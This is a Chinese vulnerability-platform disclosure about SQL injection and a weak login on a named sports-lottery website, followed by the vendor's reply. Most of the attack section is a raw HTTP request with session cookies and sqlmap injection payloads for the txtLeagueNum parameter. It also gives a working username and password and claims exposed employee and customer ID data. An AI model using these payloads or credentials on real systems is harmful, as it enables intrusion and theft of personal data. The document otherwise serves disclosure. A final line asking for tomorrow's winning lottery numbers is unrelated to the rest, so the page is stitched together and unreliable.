2015-12-17: 细节已通知厂商并且等待厂商处理中 2015-12-17: 厂商已经确认,细节仅向厂商公开 2015-12-27: 细节向核心白帽子及相关领域专家公开 2016-01-06: 细节向普通白帽子公开 2016-01-16: 细节向实习白帽子公开 2016-01-28: 细节向公众公开
RT
漏洞系统:http://www.cnsportslottery.cn/弱口令:wangyong 123456注入点
漏洞地址:
POST /qdgl/qdgl_jmszz_list.aspx HTTP/1.1Host: www.cnsportslottery.cnProxy-Connection: keep-aliveContent-Length: 788Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://www.cnsportslottery.cnUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36Content-Type: application/x-www-form-urlencodedReferer: http://www.cnsportslottery.cn/qdgl/qdgl_jmszz_list.aspxAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8Cookie: ASP.NET_SessionId=ts4cbi45hpd3swnaeik40155; rqDSv7Yb%2fKI%3d=4isdgEYQyr2llvsuyt8Nk3WtTbkFZ04O; Hm_lvt_535e4ff4a164a77aeb4194229ad0e8b2=1450102286; Hm_lpvt_535e4ff4a164a77aeb4194229ad0e8b2=1450102409__VIEWSTATE=kr3tnCPoIgEPxdpBU%2BbLop5MhiJCJV530AZpBiRcRQUiVnH6lZ7gSfOwGl0B6hI1%2BW9WMNJmnQ4azJyqqlq65fm09VRqL2pRIgY%2BRLx95fcv3vwyqCE6F8G88HfV%2FtJKn7EhqKA4%2BQqu0MrERDuV%2BNgpL3mbnQB6%2FTIs68j8DHHZe73fcZJ3NaeWYJmFZ%2BClS%2BwptfvXVuskBv%2FcZP1xSIK65kLT8LE2%2B1euXn6GtZ3I8e5yA6mMvi0sPEDBNaouqqcz9v1xVLSBepcnJm5KNKzTl%2Fwj%2BH1BrlEXyztGiN8pEBdQg%2FzRalj8s9hWCHeolqjcCSYO2EP%2B0i4n%2BSafZhcV5jsTS2Uauyc1lH2P%2FfxoG%2FoTCkb6pYDjEsc3%2BYudvfC9aQ8GWoCwdcUtkSoLjA%3D%3D&__VIEWSTATEENCRYPTED=&__EVENTVALIDATION=75%2BAL8%2B5niiYkwPpGdwjXSyrqg0%2B0pPPM7%2BqoTGTZeJa4wZqd%2FzI1fy1udxt9%2Fk1QjSHSGc1Scn%2BTsNrunXamFX%2BcmgmkJM%2BHqcPL%2Fr%2FIroSgiNTSCtBSq7ZqIzMw1LrKbPvnw3Tmbnuhn0EfJ%2FAcQ%3D%3D&txtLeagueNum=jc-gs-lz-140112969*&txtCompany=&txtStartTime=&txtEndTime=&ddlStatus=-1&btnQuery=%B2%E9%D1%AF
txtLeagueNum参数存在注入
---Parameter: #1* ((custom) POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: __VIEWSTATE=kr3tnCPoIgEPxdpBU+bLop5MhiJCJV530AZpBiRcRQUiVnH6lZ7gSfOwGl0B6hI1+W9WMNJmnQ4azJyqqlq65fm09VRqL2pRIgY+RLx95fcv3vwyqCE6F8G88HfV/tJKn7EhqKA4+Qqu0MrERDuV+NgpL3mbnQB6/TIs68j8DHHZe73fcZJ3NaeWYJmFZ+ClS+wptfvXVuskBv/cZP1xSIK65kLT8LE2+1euXn6GtZ3I8e5yA6mMvi0sPEDBNaouqqcz9v1xVLSBepcnJm5KNKzTl/wj+H1BrlEXyztGiN8pEBdQg/zRalj8s9hWCHeolqjcCSYO2EP+0i4n+SafZhcV5jsTS2Uauyc1lH2P/fxoG/oTCkb6pYDjEsc3+YudvfC9aQ8GWoCwdcUtkSoLjA==&__VIEWSTATEENCRYPTED=&__EVENTVALIDATION=75+AL8+5niiYkwPpGdwjXSyrqg0+0pPPM7+qoTGTZeJa4wZqd/zI1fy1udxt9/k1QjSHSGc1Scn+TsNrunXamFX+cmgmkJM+HqcPL/r/IroSgiNTSCtBSq7ZqIzMw1LrKbPvnw3Tmbnuhn0EfJ/AcQ==&txtLeagueNum=jc-gs-lz-140112969%' AND 6537=6537 AND '%'='&txtCompany=&txtStartTime=&txtEndTime=&ddlStatus=-1&btnQuery=%B2%E9%D1%AF Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: __VIEWSTATE=kr3tnCPoIgEPxdpBU+bLop5MhiJCJV530AZpBiRcRQUiVnH6lZ7gSfOwGl0B6hI1+W9WMNJmnQ4azJyqqlq65fm09VRqL2pRIgY+RLx95fcv3vwyqCE6F8G88HfV/tJKn7EhqKA4+Qqu0MrERDuV+NgpL3mbnQB6/TIs68j8DHHZe73fcZJ3NaeWYJmFZ+ClS+wptfvXVuskBv/cZP1xSIK65kLT8LE2+1euXn6GtZ3I8e5yA6mMvi0sPEDBNaouqqcz9v1xVLSBepcnJm5KNKzTl/wj+H1BrlEXyztGiN8pEBdQg/zRalj8s9hWCHeolqjcCSYO2EP+0i4n+SafZhcV5jsTS2Uauyc1lH2P/fxoG/oTCkb6pYDjEsc3+YudvfC9aQ8GWoCwdcUtkSoLjA==&__VIEWSTATEENCRYPTED=&__EVENTVALIDATION=75+AL8+5niiYkwPpGdwjXSyrqg0+0pPPM7+qoTGTZeJa4wZqd/zI1fy1udxt9/k1QjSHSGc1Scn+TsNrunXamFX+cmgmkJM+HqcPL/r/IroSgiNTSCtBSq7ZqIzMw1LrKbPvnw3Tmbnuhn0EfJ/AcQ==&txtLeagueNum=jc-gs-lz-140112969%' AND 2790=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (2790=2790) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(113)+CHAR(113))) AND '%'='&txtCompany=&txtStartTime=&txtEndTime=&ddlStatus=-1&btnQuery=%B2%E9%D1%AF Type: UNION query Title: Generic UNION query (NULL) - 64 columns Payload: __VIEWSTATE=kr3tnCPoIgEPxdpBU+bLop5MhiJCJV530AZpBiRcRQUiVnH6lZ7gSfOwGl0B6hI1+W9WMNJmnQ4azJyqqlq65fm09VRqL2pRIgY+RLx95fcv3vwyqCE6F8G88HfV/tJKn7EhqKA4+Qqu0MrERDuV+NgpL3mbnQB6/TIs68j8DHHZe73fcZJ3NaeWYJmFZ+ClS+wptfvXVuskBv/cZP1xSIK65kLT8LE2+1euXn6GtZ3I8e5yA6mMvi0sPEDBNaouqqcz9v1xVLSBepcnJm5KNKzTl/wj+H1BrlEXyztGiN8pEBdQg/zRalj8s9hWCHeolqjcCSYO2EP+0i4n+SafZhcV5jsTS2Uauyc1lH2P/fxoG/oTCkb6pYDjEsc3+YudvfC9aQ8GWoCwdcUtkSoLjA==&__VIEWSTATEENCRYPTED=&__EVENTVALIDATION=75+AL8+5niiYkwPpGdwjXSyrqg0+0pPPM7+qoTGTZeJa4wZqd/zI1fy1udxt9/k1QjSHSGc1Scn+TsNrunXamFX+cmgmkJM+HqcPL/r/IroSgiNTSCtBSq7ZqIzMw1LrKbPvnw3Tmbnuhn0EfJ/AcQ==&txtLeagueNum=jc-gs-lz-140112969%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(113)+CHAR(99)+CHAR(111)+CHAR(99)+CHAR(88)+CHAR(84)+CHAR(80)+CHAR(74)+CHAR(117)+CHAR(84)+CHAR(102)+CHAR(89)+CHAR(113)+CHAR(79)+CHAR(107)+CHAR(113)+CHAR(67)+CHAR(65)+CHAR(84)+CHAR(100)+CHAR(88)+CHAR(84)+CHAR(83)+CHAR(82)+CHAR(66)+CHAR(113)+CHAR(112)+CHAR(82)+CHAR(70)+CHAR(111)+CHAR(100)+CHAR(107)+CHAR(122)+CHAR(122)+CHAR(76)+CHAR(81)+CHAR(110)+CHAR(66)+CHAR(80)+CHAR(103)+CHAR(90)+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(113)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &txtCompany=&txtStartTime=&txtEndTime=&ddlStatus=-1&btnQuery=%B2%E9%D1%AF---
数据库,当前用户及dba权限:
大量敏感信息泄漏,
6.4W员工信息手机号、邮箱等等含密码
另外,lot_XSInfo表近6W用户数据,包含姓名、身份证号、手机等敏感信息,仅dump一条数据信息作证明
声明,仅做测试,未脱库,日志可查,谢绝查水表。
@@
危害等级:高
漏洞Rank:15
确认时间:2015-12-17 15:48
非常感谢路人甲同学和乌云平台对中体彩网站的安全测试。发现的漏洞也确实是高危漏洞。该漏洞在不久前的乌云众测中已经发现。但是由于该系统在8年前由代理商开发,现在我公司也没有源代码,实在难以修复。而用户的弱密码是因为彩票网点用户从不登录修改密码所致。新的替换系统正在测试中,估计在16年1月上线替换。届时欢迎白帽子们再来测试。再次感谢!
暂无
帮我看一下明天大乐透买哪个号能中